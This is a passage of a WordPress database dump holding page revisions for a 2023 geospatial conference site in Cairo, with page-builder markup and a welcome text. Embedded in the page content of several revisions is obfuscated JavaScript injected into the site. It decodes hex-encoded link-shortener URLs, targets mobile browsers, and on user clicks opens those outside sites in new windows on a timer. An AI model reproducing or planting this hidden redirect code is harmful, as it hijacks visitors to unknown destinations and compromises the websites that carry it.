_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:11:57','2022-10-05 18:11:57','',2167,'https://gsw2023.com/?p=2305',0,'revision','',0),
(2306,1,'2022-10-05 18:12:41','2022-10-05 18:12:41','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994446572{margin-left: 20px !important;border-left-width: 20px !important;padding-left: 20px !important;border-radius: 20px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:12:41','2022-10-05 18:12:41','',2167,'https://gsw2023.com/?p=2306',0,'revision','',0),
(2307,1,'2022-10-05 18:13:14','2022-10-05 18:13:14','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" 